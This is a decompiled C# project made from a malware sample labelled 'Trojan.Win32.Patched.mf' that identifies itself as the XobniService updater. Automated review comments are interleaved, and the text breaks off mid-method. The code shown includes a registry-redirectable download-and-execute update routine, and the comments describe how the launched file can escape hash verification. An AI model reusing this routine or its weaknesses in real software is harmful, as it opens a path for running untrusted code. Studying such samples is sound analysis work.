{3FF838A6-B2D0-4042-B284-421D7F00338F}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{3FF838A6-B2D0-4042-B284-421D7F00338F}.Debug|Any CPU.Build.0 = Debug|Any CPU
{3FF838A6-B2D0-4042-B284-421D7F00338F}.Release|Any CPU.ActiveCfg = Release|Any CPU
{3FF838A6-B2D0-4042-B284-421D7F00338F}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,15 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: AssemblyCompany("Xobni Corporation")]
[assembly: AssemblyProduct("XobniService")]
[assembly: AssemblyCopyright("Copyright © 2007-2009 Xobni Corporation")]
[assembly: AssemblyTitle("XobniService")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: ComVisible(false)]
[assembly: Dotfuscator("57259:1:0:4.2.5005.34681", 0)]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyFileVersion("1.8.3.7917")]
[assembly: Guid("7325476e-5347-4dc7-8737-4fd22ee30635")]
[assembly: AssemblyVersion("1.8.3.7917")]
@@ -0,0 +1,33 @@
// Decompiled with JetBrains decompiler
// Type: DotfuscatorAttribute
// Assembly: XobniService, Version=1.8.3.7917, Culture=neutral, PublicKeyToken=6298d2d1fcfb5d85
// MVID: EA9F7D71-4A8D-4739-A320-5F01FC76E972
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.exe
using System;
using System.Runtime.InteropServices;
[AttributeUsage(AttributeTargets.Assembly)]
[ComVisible(false)]
public sealed class DotfuscatorAttribute : Attribute
{
private string a;
private int c;
public DotfuscatorAttribute(string a, int c)
{
DotfuscatorAttribute dotfuscatorAttribute = this;
// ISSUE: explicit constructor call
dotfuscatorAttribute.\u002Ector();
dotfuscatorAttribute.a = a;
this.c = c;
}
public string A => this.a;
public string a() => this.a;
public int C => this.c;
public int c() => this.c;
}
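Review bot: The constructor body is decompiler residue rather than C#: `dotfuscatorAttribute.\u002Ector();` is the base `.ctor` call spelled as a method. The field `a` also shares its name with the method `a()` (likewise `c` and `c()`), so the type does not compile as committed. A comment above the constructor such as `// decompiler artifact: base .ctor call; member names come from the obfuscator, not valid C#` would stop readers treating it as recovered source. The banner also deserves a one-line caveat: the assembly identifies itself as the strong-named `XobniService`, while the sample is filed as `Trojan.Win32.Patched.mf`. That suggests a modified copy of a vendor binary, but this is inferred from the names alone and should be confirmed against the PE rather than from this marker class.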
@@ -0,0 +1,15 @@
// Decompiled with JetBrains decompiler
// Type: GroupPolicy.PolicySetting
// Assembly: XobniService, Version=1.8.3.7917, Culture=neutral, PublicKeyToken=6298d2d1fcfb5d85
// MVID: EA9F7D71-4A8D-4739-A320-5F01FC76E972
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.exe
namespace GroupPolicy
{
public enum PolicySetting
{
Off,
On,
NotConfigured,
}
}
@@ -0,0 +1,65 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{502BA071-D20D-4ACB-ABAE-90EAC7DDA9E6}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>XobniService</AssemblyName>
<ApplicationVersion>1.8.3.7917</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.ServiceProcess" />
<Reference Include="System.Web" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="DotfuscatorAttribute.cs" />
<Compile Include="x.cs" />
<Compile Include="o4.cs" />
<Compile Include="u5.cs" />
<Compile Include="eh.cs" />
<Compile Include="ady.cs" />
<Compile Include="p3.cs" />
<Compile Include="jf.cs" />
<Compile Include="l9.cs" />
<Compile Include="aaa.cs" />
<Compile Include="hs.cs" />
<Compile Include="rx.cs" />
<Compile Include="gs.cs" />
<Compile Include="q8.cs" />
<Compile Include="lq.cs" />
<Compile Include="fb.cs" />
<Compile Include="uj.cs" />
<Compile Include="lo.cs" />
<Compile Include="ks.cs" />
<Compile Include="GroupPolicy\PolicySetting.cs" />
<Compile Include="XobniLogging\Level.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="x.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "XobniService", "Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.csproj", "{502BA071-D20D-4ACB-ABAE-90EAC7DDA9E6}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{502BA071-D20D-4ACB-ABAE-90EAC7DDA9E6}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{502BA071-D20D-4ACB-ABAE-90EAC7DDA9E6}.Debug|Any CPU.Build.0 = Debug|Any CPU
{502BA071-D20D-4ACB-ABAE-90EAC7DDA9E6}.Release|Any CPU.ActiveCfg = Release|Any CPU
{502BA071-D20D-4ACB-ABAE-90EAC7DDA9E6}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,14 @@
// Decompiled with JetBrains decompiler
// Type: XobniLogging.Level
// Assembly: XobniService, Version=1.8.3.7917, Culture=neutral, PublicKeyToken=6298d2d1fcfb5d85
// MVID: EA9F7D71-4A8D-4739-A320-5F01FC76E972
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.exe
namespace XobniLogging
{
internal enum Level
{
Debug,
Exception,
}
}
@@ -0,0 +1,35 @@
// Decompiled with JetBrains decompiler
// Type: aaa
// Assembly: XobniService, Version=1.8.3.7917, Culture=neutral, PublicKeyToken=6298d2d1fcfb5d85
// MVID: EA9F7D71-4A8D-4739-A320-5F01FC76E972
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.exe
using System.Runtime.CompilerServices;
internal class aaa
{
private int a;
private string b;
private string c;
private string d;
public aaa(int A_0, string A_1, string A_2, string A_3)
{
this.a = A_0;
this.b = A_1;
this.c = A_2;
this.d = A_3;
}
[SpecialName]
public int a() => this.a;
[SpecialName]
public string c() => this.b;
[SpecialName]
public string b() => this.c;
[SpecialName]
public string d() => this.d;
}
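Review bot: The accessors at the end of `aaa` are crossed: `c()` returns `this.b` and `b()` returns `this.c`, which is easy to misread when tracing call sites through the other obfuscated files. A comment above the pair, for example `// note: c() reads field b and b() reads field c; names were assigned independently by the obfuscator`, would make that explicit. The `[SpecialName]` markers suggest these were property getters before renaming, though the page does not show the original names. As committed, the fields and methods also share identifiers (`a` and `a()`, `d` and `d()`), so the class is reading material for analysis rather than buildable source.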
@@ -0,0 +1,197 @@
// Decompiled with JetBrains decompiler
// Type: ady
// Assembly: XobniService, Version=1.8.3.7917, Culture=neutral, PublicKeyToken=6298d2d1fcfb5d85
// MVID: EA9F7D71-4A8D-4739-A320-5F01FC76E972
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.exe
using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Text;
using System.Xml;
using XobniLogging;
internal static class ady
{
private const int a = 200;
private const int b = 50000;
private const string c = "Software\\Xobni\\Settings";
private const int d = 200000;
private const int e = 1000000;
private static bool? f = new bool?();
private static readonly UnicodeEncoding g = new UnicodeEncoding(!BitConverter.IsLittleEndian, false, false);
internal static void a(Level A_0, string A_1, Exception A_2)
{
string A_1_1 = ady.a(A_1, A_2, A_0);
ady.a(A_0, A_1_1);
}
internal static void a(Level A_0, string A_1)
{
try
{
if (A_1 == null)
throw new ArgumentNullException("message");
if (A_0 == Level.Exception)
ady.d(ady.c(A_1));
ady.b(A_1);
}
catch (Exception ex)
{
try
{
ady.b(ex.ToString());
}
catch
{
}
}
}
private static void d(string A_0)
{
string s = Environment.NewLine + Environment.NewLine + A_0 + Environment.NewLine + Environment.NewLine;
byte[] bytes = ady.g.GetBytes(s);
string str = Path.Combine(ady.b(), "Xobni.log");
if (File.Exists(str) && new FileInfo(str).Length > 50000L)
return;
using (FileStream fileStream = new FileStream(str, FileMode.Append, FileAccess.Write, FileShare.None))
fileStream.Write(bytes, 0, bytes.Length);
}
internal static string b()
{
RegistryKey currentUser = Registry.CurrentUser;
string path = string.Empty;
try
{
using (RegistryKey registryKey = currentUser.OpenSubKey("Software\\Xobni", false))
{
if (registryKey != null)
path = registryKey.GetValue("DataFiles") as string;
}
}
catch (Exception ex)
{
ady.b("Error getting location of directory from registry");
}
if (string.IsNullOrEmpty(path))
path = ady.a();
if (!string.IsNullOrEmpty(path))
{
try
{
if (!Directory.Exists(path))
Directory.CreateDirectory(path);
if ((new DirectoryInfo(path).Attributes & FileAttributes.ReadOnly) == FileAttributes.ReadOnly)
{
ady.b("Directory " + path + " is read-only, using default directory");
path = ady.a();
}
}
catch (Exception ex)
{
ady.b("Error creating directory: " + path);
ady.b("Reverting to default data file directory");
path = ady.a();
}
}
else
path = ady.a();
return path;
}
private static string a() => Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\Xobni\\";
private static string a(string A_0, Exception A_1, Level A_2)
{
Dictionary<string, string> A_0_1 = new Dictionary<string, string>();
A_0_1.Add("DescriptionHint", A_0);
A_0_1.Add("Level", Enum.GetName(typeof (Level), (object) A_2));
A_0_1.Add("Message", A_1.Message);
A_0_1.Add("Type", A_1.GetType().Name);
A_0_1.Add("StackTrace", A_1.StackTrace);
if (A_1.InnerException != null)
{
A_0_1.Add("InnerMessage", A_1.InnerException.Message);
A_0_1.Add("InnerStackTrace", A_1.InnerException.StackTrace);
if (A_1.InnerException.InnerException != null)
{
A_0_1.Add("InnerInnerMessage", A_1.InnerException.InnerException.Message);
A_0_1.Add("InnerInnerStackTrace", A_1.InnerException.InnerException.StackTrace);
}
}
return ady.a(A_0_1);
}
public static string a(Dictionary<string, string> A_0)
{
if (A_0 == null)
return (string) null;
XmlDocument xmlDocument = new XmlDocument();
XmlElement element1 = xmlDocument.CreateElement("Exception");
int num1 = 0;
foreach (KeyValuePair<string, string> keyValuePair in A_0)
{
int num2 = keyValuePair.Value != null ? keyValuePair.Value.Length : 0;
num1 += keyValuePair.Key.Length + num2;
if (keyValuePair.Key.Length <= 200000 && num2 <= 200000)
{
if (num1 <= 1000000)
{
XmlElement element2 = xmlDocument.CreateElement(keyValuePair.Key);
element2.AppendChild((XmlNode) xmlDocument.CreateTextNode(keyValuePair.Value ?? "NULL"));
element1.AppendChild((XmlNode) element2);
}
else
break;
}
}
xmlDocument.AppendChild((XmlNode) element1);
XmlWriterSettings settings = new XmlWriterSettings();
settings.ConformanceLevel = ConformanceLevel.Fragment;
settings.OmitXmlDeclaration = true;
StringBuilder output = new StringBuilder();
XmlWriter w = XmlWriter.Create(output, settings);
if (xmlDocument.DocumentElement != null)
xmlDocument.DocumentElement.WriteTo(w);
w.Flush();
return output.ToString();
}
private static string c(string A_0)
{
Version version = Assembly.GetExecutingAssembly().GetName().Version;
return "[" + DateTime.UtcNow.ToString("dd/MMM/yyyy HH:mm:ss.ffff") + "] Xobni-" + (object) version + ": " + A_0;
}
internal static void b(string A_0)
{
if (!ady.f.HasValue)
ady.f = new bool?(ady.a("ConnectorOutputDebug") != null);
string str = ady.c(A_0);
if (!ady.f.Value)
return;
int length;
for (int startIndex = 0; startIndex < str.Length; startIndex += length)
{
length = Math.Min(200, str.Length - startIndex);
Debugger.Log(1, "", str.Substring(startIndex, length));
}
}
private static string a(string A_0)
{
using (RegistryKey registryKey1 = Registry.LocalMachine.OpenSubKey("Software\\Xobni\\Settings", false))
{
if (registryKey1 != null)
return registryKey1.GetValue(A_0, (object) null) as string;
using (RegistryKey registryKey2 = Registry.LocalMachine.OpenSubKey("Software\\Xobni\\Settings", false))
return registryKey2 == null ? (string) null : registryKey2.GetValue(A_0, (object) null) as string;
}
}
}
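Review bot: The fallback in the private `a(string A_0)` registry reader at the end of the class can never help: when the first `Registry.LocalMachine.OpenSubKey("Software\\Xobni\\Settings", false)` returns null, the nested `using` opens exactly the same key and gets null again. Either the second lookup was meant for another hive or registry view (the decompiled output cannot tell), or it should be dropped so the method reads `return registryKey1 == null ? null : registryKey1.GetValue(A_0, null) as string;`. A one-line comment naming the location the fallback was intended for would stop the next reader from assuming a second source exists.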
@@ -0,0 +1,44 @@
// Decompiled with JetBrains decompiler
// Type: eh
// Assembly: XobniService, Version=1.8.3.7917, Culture=neutral, PublicKeyToken=6298d2d1fcfb5d85
// MVID: EA9F7D71-4A8D-4739-A320-5F01FC76E972
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.exe
using System;
using System.Runtime.InteropServices;
public static class eh
{
public static void b(string A_0) => eh.a("DllRegisterServer", A_0);
public static void a(string A_0) => eh.a("DllUnregisterServer", A_0);
public static void a(string A_0, string A_1)
{
IntPtr A_0_1 = IntPtr.Zero;
try
{
A_0_1 = eh.LoadLibrary(A_1);
IntPtr ptr = !(A_0_1 == IntPtr.Zero) ? eh.GetProcAddress(A_0_1, A_0) : throw new Exception("Could not load library: " + (object) Marshal.GetLastWin32Error());
if (ptr == IntPtr.Zero)
throw new Exception("Could not find DllRegisterServer entry point: " + (object) Marshal.GetLastWin32Error());
int num = ((eh.a) Marshal.GetDelegateForFunctionPointer(ptr, typeof (eh.a)))();
}
finally
{
if (A_0_1 != IntPtr.Zero && !eh.FreeLibrary(A_0_1))
throw new Exception("Could not FreeLibrary: " + (object) Marshal.GetLastWin32Error());
}
}
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern IntPtr GetProcAddress(IntPtr A_0, string A_1);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern IntPtr LoadLibrary(string A_0);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern bool FreeLibrary(IntPtr A_0);
private delegate int a();
}
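Review bot: The value returned by the registration export is stored in `num` and then discarded in `a(string A_0, string A_1)`, so a `DllRegisterServer` or `DllUnregisterServer` call that fails is reported to callers as success. Checking it right after the call, `if (num < 0) Marshal.ThrowExceptionForHR(num);`, would surface the failure to the callers that already log exceptions. The entry-point error text also hard-codes "DllRegisterServer" although the same path serves unregistration; `"Could not find " + A_0 + " entry point: "` keeps the log truthful. Separately, throwing from the `finally` block when `FreeLibrary` fails replaces any exception already in flight from the `try`.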
@@ -0,0 +1,155 @@
// Decompiled with JetBrains decompiler
// Type: fb
// Assembly: XobniService, Version=1.8.3.7917, Culture=neutral, PublicKeyToken=6298d2d1fcfb5d85
// MVID: EA9F7D71-4A8D-4739-A320-5F01FC76E972
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.exe
using System;
using System.Diagnostics;
using System.IO;
using XobniLogging;
internal static class fb
{
private const string a = "XobniServiceUpdates";
private const string b = "XobniServiceUpdatesExec";
internal static void a()
{
try
{
try
{
if (!rx.g())
{
ady.a(Level.Debug, "CheckForNewUpdates disabled by Group Policy");
return;
}
}
catch (Exception ex)
{
ady.a(Level.Exception, "Group Policy", ex);
}
try
{
ady.a(Level.Debug, "CheckForNewUpdates started");
if (hs.b(Path.Combine(hs.a(), "XobniServiceUpdates"), "XobniServiceUpdates") == null)
return;
ady.a(Level.Debug, "Update is available.");
}
catch (Exception ex)
{
ady.a(Level.Exception, "Top level", ex);
}
finally
{
ady.a(Level.Debug, "Finished.");
}
}
catch (Exception ex)
{
ady.a(Level.Exception, "Outer catch block", ex);
}
}
internal static void a(bool? A_0)
{
if (A_0.GetValueOrDefault(false))
return;
try
{
try
{
try
{
if (!rx.g())
{
ady.a(Level.Debug, "RunExistingUpdates disabled by Group Policy");
return;
}
}
catch (Exception ex)
{
ady.a(Level.Exception, "Group Policy", ex);
}
ady.a(Level.Debug, "RunExistingUpdates started");
string path1 = hs.a();
string str1 = Path.Combine(path1, "XobniServiceUpdates");
string str2 = Path.Combine(path1, "XobniServiceUpdatesExec");
if (!hs.c(str1))
return;
aaa A_1 = hs.b("XobniServiceUpdatesPreUpdate");
if (A_1 == null)
{
try
{
if (!Directory.Exists(str1))
return;
foreach (string file in Directory.GetFiles(str1))
File.Delete(file);
}
catch (Exception ex)
{
ady.a(Level.Exception, "Couldn't delete existing downloads from " + str1, ex);
}
}
else
{
string str3 = Path.Combine(str1, A_1.b());
string str4 = Path.Combine(str2, A_1.b());
if (!hs.a(str1, A_1))
{
try
{
File.Delete(str3);
ady.a(Level.Debug, "Deleted unverified download:" + str3);
}
catch (Exception ex)
{
ady.a(Level.Exception, "Couldn't delete unverified download: " + str3, ex);
}
}
else
{
if (!Directory.Exists(str2))
{
ady.a(Level.Debug, "Creating updates exec directory.");
Directory.CreateDirectory(str2);
}
if (File.Exists(str4))
{
try
{
File.Delete(str4);
}
catch (Exception ex)
{
ady.a(Level.Exception, "Could not delete target file " + str4, ex);
}
}
try
{
File.Move(str3, str4);
}
catch (Exception ex)
{
ady.a(Level.Exception, "Could not move file " + str3 + " to " + str4, ex);
}
Process.Start(str4);
}
}
}
catch (Exception ex)
{
ady.a(Level.Exception, "Top level", ex);
}
finally
{
ady.a(Level.Debug, "Finished.");
}
}
catch
{
}
}
}
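Review bot: In `a(bool? A_0)` the call `Process.Start(str4)` still runs after the `File.Move(str3, str4)` catch block has logged a failure, and a failed `File.Delete(str4)` is also only logged, so whatever file already sits at the exec path is launched even though the hash check covered only the download at `str3`. The move failure should end the method (`return;` in that catch), and the file should be re-verified at its final location immediately before launch, e.g. `if (!hs.a(str2, A_1)) return;` ahead of `Process.Start(str4)`. The Group Policy probe in both methods also fails open: an exception from `rx.g()` is logged and the update logic continues, so if policy is meant to be authoritative that catch should return as well.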
@@ -0,0 +1,44 @@
// Decompiled with JetBrains decompiler
// Type: gs
// Assembly: XobniService, Version=1.8.3.7917, Culture=neutral, PublicKeyToken=6298d2d1fcfb5d85
// MVID: EA9F7D71-4A8D-4739-A320-5F01FC76E972
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.exe
using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Web;
using XobniLogging;
internal static class gs
{
internal static a? a<a>(object A_0) where a : struct => A_0 == null ? new a?() : new a?((a) A_0);
internal static string a(IEnumerable<KeyValuePair<string, string>> A_0)
{
List<string> stringList = new List<string>();
foreach (KeyValuePair<string, string> keyValuePair in A_0)
stringList.Add(HttpUtility.UrlEncode(keyValuePair.Key) + "=" + HttpUtility.UrlEncode(keyValuePair.Value));
return string.Join("&", stringList.ToArray());
}
internal static bool? b()
{
try
{
return new bool?(Process.GetProcessesByName("OUTLOOK").Length > 0);
}
catch (InvalidOperationException ex)
{
ady.a(Level.Exception, "IsOutlookRunning", (Exception) ex);
return new bool?();
}
}
internal static string a()
{
using (RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("Software\\Xobni"))
return registryKey == null ? (string) null : registryKey.GetValue("InstallDir") as string;
}
}
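Review bot: The generic helper `a<a>(object A_0)` unboxes with a direct cast, so a registry value of a different kind than the caller expects (for example a string where a DWORD is assumed) raises `InvalidCastException` instead of yielding an empty nullable. A type test keeps the "no value" meaning: `A_0 is a ? new a?((a) A_0) : new a?()`. In `b()`, the `Process` objects returned by `GetProcessesByName("OUTLOOK")` are never disposed although only the array length is used.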
@@ -0,0 +1,329 @@
// Decompiled with JetBrains decompiler
// Type: hs
// Assembly: XobniService, Version=1.8.3.7917, Culture=neutral, PublicKeyToken=6298d2d1fcfb5d85
// MVID: EA9F7D71-4A8D-4739-A320-5F01FC76E972
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.exe
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Security.Cryptography;
using System.Security.Cryptography.X509Certificates;
using System.Text;
using System.Xml;
using XobniLogging;
public class hs
{
private const string a = "XobniUpdaterShared";
private const string b = "E=support@xobni.com, CN=XobniUpdate, O=Xobni Corporation, S=CA, C=US";
private const string c = "{0}?version={1}&source={2}&xmid={3}";
public static readonly string d = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "Xobni");
private static readonly string e = "http://updates." + u5.a() + "/update";
private static string f = (string) null;
private static readonly X509Certificate2 g = new X509Certificate2(Encoding.UTF8.GetBytes("\r\n-----BEGIN CERTIFICATE-----\r\nMIIExDCCA6ygAwIBAgIJAI0ql5mKlFKYMA0GCSqGSIb3DQEBBQUAMIGcMQswCQYD\r\nVQQGEwJVUzELMAkGA1UECBMCQ0ExFjAUBgNVBAcTDVNhbiBGcmFuY2lzY28xGjAY\r\nBgNVBAoTEVhvYm5pIENvcnBvcmF0aW9uMRwwGgYDVQQLExNFZGd5IEdydWZmIFNl\r\nY3VyaXR5MREwDwYDVQQDEwhYb2JuaSBDQTEbMBkGCSqGSIb3DQEJARYMY2FAeG9i\r\nbmkuY29tMB4XDTA3MDcxMTAyNDUyNVoXDTE3MDcwODAyNDUyNVowgZwxCzAJBgNV\r\nBAYTAlVTMQswCQYDVQQIEwJDQTEWMBQGA1UEBxMNU2FuIEZyYW5jaXNjbzEaMBgG\r\nA1UEChMRWG9ibmkgQ29ycG9yYXRpb24xHDAaBgNVBAsTE0VkZ3kgR3J1ZmYgU2Vj\r\ndXJpdHkxETAPBgNVBAMTCFhvYm5pIENBMRswGQYJKoZIhvcNAQkBFgxjYUB4b2Ju\r\naS5jb20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQC1cDGSvJVhrET8\r\niih6B77OwPeuD7AzUFvFq2zakCB6TvKzfc4KjxZuOhH3WU1wk64YAF3102bvA+7O\r\nlvOGeDJ9b5zYCQxpva2ey0HkuaxroT3fHz2ZfiWsUmcqvE/4XNri6JTdj+B4djf6\r\nPfNoE2nsxyS8LFu7oWCB5g0aRpxhbZbB0djmLQOphclw7uNETQekid0Gi/g7buFS\r\nCq8r77rnwuBsVuHKjtmWl3/+cgEHKvNxbYd1LLbkAvjiDw6IiIhpGvghbFgFQkmc\r\nMAvwzijep/Ala5xUzZFsMuLlnZhBQzmGKoWClawUALdgm/NEp+pnDb5AGOpfCWbb\r\nGhc9n/PBAgMBAAGjggEFMIIBATAdBgNVHQ4EFgQUiGwYgUQupLrtpqNAPnu+Pi7D\r\n/IAwgdEGA1UdIwSByTCBxoAUiGwYgUQupLrtpqNAPnu+Pi7D/IChgaKkgZ8wgZwx\r\nCzAJBgNVBAYTAlVTMQswCQYDVQQIEwJDQTEWMBQGA1UEBxMNU2FuIEZyYW5jaXNj\r\nbzEaMBgGA1UEChMRWG9ibmkgQ29ycG9yYXRpb24xHDAaBgNVBAsTE0VkZ3kgR3J1\r\nZmYgU2VjdXJpdHkxETAPBgNVBAMTCFhvYm5pIENBMRswGQYJKoZIhvcNAQkBFgxj\r\nYUB4b2JuaS5jb22CCQCNKpeZipRSmDAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEB\r\nBQUAA4IBAQCBFcZV4FD0ljxSe5JCn14beYGfXxm06Opv2LsyboqywFzUE/ABZj7Z\r\nOeCV1IEQfFYb4TC+9/3Yq1FXkJhNcPajuCrm9Nq7OPxZeUD02mt45e8FS6FMadEm\r\nb6pTXETehoIcs2eYUI9dPEfKdoTOCRXDuEruOh2CjO+P0aNxSbzqTfgprcV1qSno\r\nFMDVnmH155+L8Jh9kK+ZLHms/Udcgz0YAzgze0eGKWMa2rrwCSNkqyEvkK34Ed/C\r\nXn3H0Z6AAq22Fc/bKJGomvuPWeycdB9JSIuI844a6HOfFU5+kT57nkwwxhwLntu7\r\nE/AISDiAMBLExQK2F6vOhbAGCI+55KsR\r\n-----END CERTIFICATE-----\r\n"));
private static readonly char[] h = new char[16]
{
'0',
'1',
'2',
'3',
'4',
'5',
'6',
'7',
'8',
'9',
'A',
'B',
'C',
'D',
'E',
'F'
};
public static string b()
{
if (hs.f != null)
return hs.f;
try
{
using (RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("Software\\Xobni", false))
{
if (registryKey != null)
hs.f = (string) registryKey.GetValue("OverrideUpdatePath", (object) hs.e);
}
}
catch
{
hs.f = hs.e;
}
return hs.f;
}
internal static string a()
{
using (RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("Software\\Xobni"))
{
if (registryKey != null)
return (string) registryKey.GetValue("InstallDir");
ady.a(Level.Debug, "No Xobni local machine registry key.");
return (string) null;
}
}
internal static string b(string A_0, string A_1)
{
aaa aaa = hs.b(A_1);
if (aaa == null)
{
ady.a(Level.Debug, "No new updates.");
return (string) null;
}
hs.a(aaa);
string str = Path.Combine(A_0, aaa.b());
if (Directory.Exists(A_0))
{
if (hs.c(A_0) && hs.a(A_0, aaa))
return str;
ady.a(Level.Debug, "Deleting old/bad updates.");
Directory.Delete(A_0, true);
}
if (!Directory.Exists(A_0))
{
ady.a(Level.Debug, "Creating update directory.");
Directory.CreateDirectory(A_0);
}
ady.a(Level.Debug, "Downloading update...");
HttpWebRequest httpWebRequest = (HttpWebRequest) WebRequest.Create(aaa.c());
try
{
httpWebRequest.Proxy = WebRequest.DefaultWebProxy;
}
catch (Exception ex)
{
ady.a(Level.Debug, "Error setting web proxy on downloadRequest: " + ex.Message);
}
WebResponse response;
try
{
response = httpWebRequest.GetResponse();
}
catch (WebException ex)
{
ady.a(Level.Debug, "Could not access XobniUpdate.exe URL: " + ex.Message);
return (string) null;
}
using (Stream responseStream = response.GetResponseStream())
{
using (FileStream A_1_1 = new FileStream(str, FileMode.Create))
hs.a(responseStream, (Stream) A_1_1);
}
ady.a(Level.Debug, "Update download completed.");
return hs.a(str, aaa.d()) ? str : throw new Exception("Invalid update hash.");
}
internal static bool c(string A_0)
{
if (Directory.Exists(A_0) && Directory.GetFiles(A_0).Length > 0)
{
ady.a(Level.Debug, "An update is available (but not yet verified).");
return true;
}
ady.a(Level.Debug, "There are no pending updates available.");
return false;
}
internal static bool a(string A_0, aaa A_1)
{
string str = Path.Combine(A_0, A_1.b());
if (System.IO.File.Exists(str) && hs.a(str, A_1.d()))
{
ady.a(Level.Debug, "Correctly signed update file already exists.");
return true;
}
ady.a(Level.Debug, "An update exists, but it is not correctly signed.");
return false;
}
internal static aaa b(string A_0)
{
string path1 = hs.a();
if (path1 == null)
{
ady.a(Level.Debug, "No InstallDirectory registry value.");
return (aaa) null;
}
string fileVersion = FileVersionInfo.GetVersionInfo(Path.Combine(path1, "XobniCommon.dll")).FileVersion;
if (string.IsNullOrEmpty(fileVersion))
{
ady.a(Level.Debug, "Bad XobniCommon version " + fileVersion + ".");
return (aaa) null;
}
HttpWebRequest httpWebRequest = (HttpWebRequest) WebRequest.Create(string.Format("{0}?version={1}&source={2}&xmid={3}", (object) hs.b(), (object) fileVersion, (object) A_0, (object) jf.a()));
httpWebRequest.KeepAlive = false;
try
{
httpWebRequest.Proxy = WebRequest.DefaultWebProxy;
}
catch (Exception ex)
{
ady.a(Level.Debug, "Error setting web proxy on updateRequest: " + ex.Message);
}
WebResponse response;
try
{
response = httpWebRequest.GetResponse();
}
catch (WebException ex)
{
